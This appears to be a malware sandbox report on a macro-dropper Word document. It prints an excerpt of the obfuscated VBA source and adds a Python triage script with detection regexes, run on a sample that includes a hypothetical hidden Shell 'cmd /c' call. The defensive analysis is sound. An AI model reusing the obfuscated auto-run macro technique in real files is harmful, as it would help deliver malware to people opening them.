Verdict: MALICIOUS
Risk Score: 204

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
A critical OLE_VBA_SHELL heuristic fired: the document's VBA macros call Shell(), so the macro can run arbitrary commands, most likely to fetch and execute a second-stage payload. The ClamAV detection name Doc.Dropper.Agent-6459390-0 is consistent with that dropper role. The OLE_VBA_AUTOOPEN marker means the macro runs as soon as the document is opened, provided macros are enabled or the user enables them. The extracted macro source is heavily obfuscated (junk arithmetic between string fragments and 27 long base64-like blobs), which is why the static triage of the carved artifact is rated "likely" for obfuscation or payload.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6459390-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6459390-0
- VBA macros detected (medium, 2 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this description is at odds with the extracted artifacts section: olevba did recover a 54,024-byte decoded VBA project (macros.bas), so the marker should be read as overlapping with OLE_VBA_AUTOOPEN rather than as evidence of a separate WordBasic-only payload.
- Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace identifier present in ordinary Office files, not a network indicator, so it should not be blocked or pivoted on.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 54024 bytes |

SHA-256 of macros.bas: 7c12cfcf0b3afe108b79d6e1149d62c777d23c2e0e7cc1fbbcd591cbe9b7bba4

Detection on the carved artifact:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 27 long base64-like blobs)

The parent document's ClamAV hit does not carry over to the decoded macro text: the Doc.Dropper signature matched the OLE container, and the carved .bas file is a different byte stream, so "No threats found" here is expected rather than contradictory. The hash above is of the decoded source, not of the submitted document, so use it to correlate macro code across samples rather than as the sample's identifier.
Preview script (first 1,000 lines of the extracted script)

The excerpt shows the module attributes of ThisDocument followed by the start of a module named YUDhBCOSoTpYG. Each string literal is handed to a helper, hghbjJKfvkKs, whose definition is not in the shown portion; the chained assignments between those calls combine undefined names with CBool(), Atn() and ChrB() and are not referenced again in the shown portion, which is the junk-code padding typical of this style of obfuscation.

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "YUDhBCOSoTpYG"
Function zjVJGLPjMEv()
On Error Resume Next
OkOtzPbwP = "IonrRdq% tes&&!%ITUIVJlQQCMlQ"
PtOXcbi = kfvPFzumJJDucu = ADnjVMnN - sjcCGLq * 9146728 + CBool(1407496) - aEljr * Atn(3843032 + ChrB(QYwzRVVBVwOLNk) + ShXWXsjzSInaUN * 2872535)
RUzMOhRk = wPavPQQa = HBkPbkt - dmEMVwCk * 5088304 + CBool(5692714) - ivAnGcSwnphB * Atn(3091357 + ChrB(JQqviqYtJraKIa) + XLoncvSG * 2596690)
VrOBpoATl = (GRDHuwaVV) + hghbjJKfvkKs(OkOtzPbwP, 14, 12)
AwubSjBFMK = "ckrjdnoHkfITJUwdNpes&&s=ajJlAijIrPaCOjaUpo"
MviSI = OXabc = EHwNcqJNcjcQa - jsSVitPdwzviNd * 6604787 + CBool(5601492) - soSlqG * Atn(1803384 + ChrB(YLIFoUoGz) + VEEwjbbJ * 9277673)
iRwSMjqkUOJ = wcjfzbjb = MslJwG - GXJfGYNJMYD * 9103721 + CBool(1011032) - JhKqZvidFMkNz * Atn(7541477 + ChrB(kvGqAVDzRM) + PXSbYoWQDL * 5115483)
VPCHzGXO = (nJnGbvloPMj) + hghbjJKfvkKs(AwubSjBFMK, 19, 6)
fuoYcm = "GipJuh%4rav% teYiTqQiTj"
CMuKjQ = rSTfOMYnmldpGC = ZwtYQ - wWZzJLL * 3230569 + CBool(5705634) - JbcmiwIumdCDho * Atn(1840106 + ChrB(VGEVlw) + mtvujEANXJmTOd * 3185633)
iLHAo = bpzmmIvpl = zqEMIMLjqsiEc - lQfuuVvjFjdfm * 2353000 + CBool(1721902) - wGJqEKIKBa * Atn(1533402 + ChrB(nXoWNJAVdAv) + uTlVjcaz * 4467965)
lzZpNB = (ZKDdSzutY) + hghbjJKfvkKs(fuoYcm, 9, 9)
BnVun = "iKfGkn3rav%!!%8rajtidVmhbjAEFo"
mwSvz = EiipDlYq = jqOLVLwOBVaMf - ZmZXtQmGwiHzs * 9627090 + CBool(3998624) - BLXHiKaojJuGT * Atn(6729593 + ChrB(GZoECiOfZC) + skDVTAtHTP * 7953407)
jOLmvJLr = MPMkqkVjn = CBaDtSP - fzEFRqkLpuMM * 2946083 + CBool(2455935) - BcppuYvE * Atn(4249793 + ChrB(dhCvPHbrjjsSG) + WzfubUazqkYbDc * 4005187)
FQaYrK = (ucvllbHUt) + hghbjJKfvkKs(BnVun, 14, 11)
ctrOdWWRUq = "jJJTwKTPTkRqzFTAjVHizlMl!%6rav%Z"
fFUjIjzNS = iGhisqw = PjCpwwBXkEzJAi - pacDzrEaOszm * 1947752 + CBool(1963557) - rvATP * Atn(8056997 + ChrB(pkIbFukVwLwUsH) + nwFKJowA * 1955077)
rFLivVzk = NhMBIhTwslsuW = JpstmpqRvbIB - EjIsjwk * 8468947 + CBool(2562451) - UqidXzWXt * Atn(5482379 + ChrB(BTwCOUBv) + ktHTOPksIvmu * 9292828)
tJPUMq = (ksiPoIiPZ) + hghbjJKfvkKs(ctrOdWWRUq, 2, 7)
ffLsKE = "bdpziShEmv%!!%7rav%!&&ljCUKkIwUkk"
XOCLVqXCw = NGwAnCEr = bjmajYbiJJ - aTrMzANtk * 2293568 + CBool(4811259) - DiIXzTJvFLTNk * Atn(9259940 + ChrB(OlMMFMbstPkBmo) + HPCmjva * 229516)
TjoXCz = KzOSOzicDD = IYzThblOIPSWGu - EKzMA * 7647536 + CBool(6920520) - BFwIiukHwip * Atn(593613 + ChrB(PiFHKMsMscI) + KvTiqDLYn * 9653882)
jirGQ = (XDIMSSYEP) + hghbjJKfvkKs(ffLsKE, 11, 14)
UKLRt = "NYapSQmaQGAv% tes&&pJ"
VDXZkEs = ZqWSuzfcicFPW = ZMfEVOk - PVZALvEzujHi * 6459596 + CBool(7599207) - qsOuuYtKXMHt * Atn(4645831 + ChrB(uhRGob) + stmkY * 7166863)
rjsXXm = YHsjmXpMGUq = VKCoDBf - zzqXsMozwbKW * 7626532 + CBool(2165652) - PUaHAThazQdF * Atn(8134243 + ChrB(FjiswiZRUnajr) + iJTXKZm * 3833638)
uWuGHScNzcj = (jTHUXHToQ) + hghbjJKfvkKs(UKLRt, 2, 9)
iJCSW = "tjQjfzSVtrdCKUTIPjCtriHudlZ%UbrWsuz"
nbdcPh = FGYMDQ = PbzjQVRD - GEjMztZ * 3136123 + CBool(4075518) - Mhbwi * Atn(412775 + ChrB(UADmz) + mqWMRjvqKi * 250266)
hCCXEmmKhA = aLlJLj = rDEjoc - iPBQAbGb * 8860358 + CBool(4189205) - jIjZKCwarH * Atn(8253063 + ChrB(LpWdIah) + ikAEfp * 8796384)
znjNoC = (ufVSZtGPGzH) + hghbjJKfvkKs(iJCSW, 8, 1)
DXMpLjqTY = "UVPNZWKfLjuwvnmsZQdSMSMsCbvjkTiQuCc=%7rav% owb"
qjYXC = rawRLOUpLXo = UzubiDR - lCGFpC * 5671417 + CBool(8056287) - ZiudY * Atn(1848690 + ChrB(mwoKDEI) + FqtDPpwrqLvpT * 8267592)
IijZCCd = Ikiompuhwo = pkOGFjuQzzJ - aLcqDRcUq * 9093195 + CBool(4323046) - aYPVBLIwPfA * Atn(2448254 + ChrB(kFOuDrcwKE) + JwqQUTttNi * 6191988)
fKvQqHaa = (aAzRPjiYbSsC) + hghbjJKfvkKs(DXMpLjqTY, 4, 8)
FTukrMQRic = "mCjprkvEEcQQaaljTrKtoNqquAzbGXp u"
KzOQvNqiu = EzzIwOKV = SznVCjQf - nMTHbllAnBMdR * 1585627 + CBool(3347784) - oGqKDCCHvtULP * Atn(2236390 + ChrB(plYcavzXOW) + bIJoApWiNaZUrk * 1993858)
jdzzIa = LhQakba = ssjrvricn - btzHtf * 801 ... (truncated)
```
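The checks behind the OLE_VBA_AUTOOPEN and OLE_VBA_SHELL findings, the base64-blob count on the carved artifact, and the junk-code shape visible in the preview can all be reproduced over decoded VBA text. The script below is an added example written for this page, not code from the analyzer or from oletools. It runs on a constructed VBA fragment that copies three lines from the preview and adds a hypothetical AutoOpen entry point, Shell() call and base64 blob (none of which appear in the shown excerpt); the function names triage, strip_junk and string_fragments are the example's own.

```python
import re

# Constructed VBA fragment for the example (not the full macro from the report).
# The first string assignment, the two chained-assignment lines and the helper
# call are copied from the preview above; the AutoOpen entry point, the Shell()
# call and the base64 blob are hypothetical additions so every check has a hit.
SAMPLE_VBA = '''Attribute VB_Name = "ThisDocument"
Function zjVJGLPjMEv()
On Error Resume Next
OkOtzPbwP = "IonrRdq% tes&&!%ITUIVJlQQCMlQ"
PtOXcbi = kfvPFzumJJDucu = ADnjVMnN - sjcCGLq * 9146728 + CBool(1407496) - aEljr * Atn(3843032 + ChrB(QYwzRVVBVwOLNk) + ShXWXsjzSInaUN * 2872535)
RUzMOhRk = wPavPQQa = HBkPbkt - dmEMVwCk * 5088304 + CBool(5692714) - ivAnGcSwnphB * Atn(3091357 + ChrB(JQqviqYtJraKIa) + XLoncvSG * 2596690)
VrOBpoATl = (GRDHuwaVV) + hghbjJKfvkKs(OkOtzPbwP, 14, 12)
payload = "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXo="
End Function
Sub AutoOpen()
    zjVJGLPjMEv
    Shell "cmd /c " & VrOBpoATl, vbHide
End Sub
'''

# Auto-execution entry points that Office runs as soon as the document is
# opened or closed (OLE_VBA_AUTOOPEN in the report covers the AutoOpen case).
AUTOEXEC_RE = re.compile(
    r"\b(?:Sub|Function)\s+(AutoOpen|Auto_Open|AutoExec|AutoClose|Document_Open|Workbook_Open)\b",
    re.I,
)
# Command-execution primitives (OLE_VBA_SHELL in the report flags Shell()).
SHELL_RE = re.compile(r"\b(WScript\.Shell|Shell|ShellExecute|CreateObject)\b", re.I)
# Long runs of the base64 alphabet, the same idea as the carved-artifact blob count.
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Dead-code shape from the preview: "a = b = <arithmetic over undefined names
# with CBool(), Atn(), ChrB()>". Nothing later reads a or b, so the line is noise.
JUNK_RE = re.compile(r"^\s*\w+\s*=\s*\w+\s*=\s*.*\b(?:CBool|Atn|ChrB)\(", re.I)
# Plain string-literal assignments: the raw material the decoder helper consumes.
STRING_RE = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$')


def triage(vba):
    """Return the heuristic hits for decoded VBA text, keyed like the report's labels."""
    return {
        "OLE_VBA_AUTOOPEN": sorted({m.group(1) for m in AUTOEXEC_RE.finditer(vba)}),
        "OLE_VBA_SHELL": sorted({m.group(1) for m in SHELL_RE.finditer(vba)}),
        "base64_like_blobs": len(BASE64_RE.findall(vba)),
    }


def strip_junk(vba):
    """Drop blank lines and the chained-assignment noise; keep data and control flow."""
    return [line for line in vba.splitlines() if line.strip() and not JUNK_RE.match(line)]


def string_fragments(vba):
    """Collect quoted string fragments by variable name for follow-up decoding."""
    out = {}
    for line in vba.splitlines():
        m = STRING_RE.match(line)
        if m:
            out[m.group(1)] = m.group(2)
    return out


if __name__ == "__main__":
    print(triage(SAMPLE_VBA))
    print("\n".join(strip_junk(SAMPLE_VBA)))
    print(string_fragments(SAMPLE_VBA))
```

In a real pipeline the text fed to these functions comes from olevba's extracted macro source (the report's macros.bas); the regexes are deliberately loose, so a hit is a triage signal to be confirmed by reading the surviving lines, not a verdict. Junk stripping only removes the one dead-code pattern shown in the preview, and the decoder helper still has to be read or emulated to learn what the string fragments become.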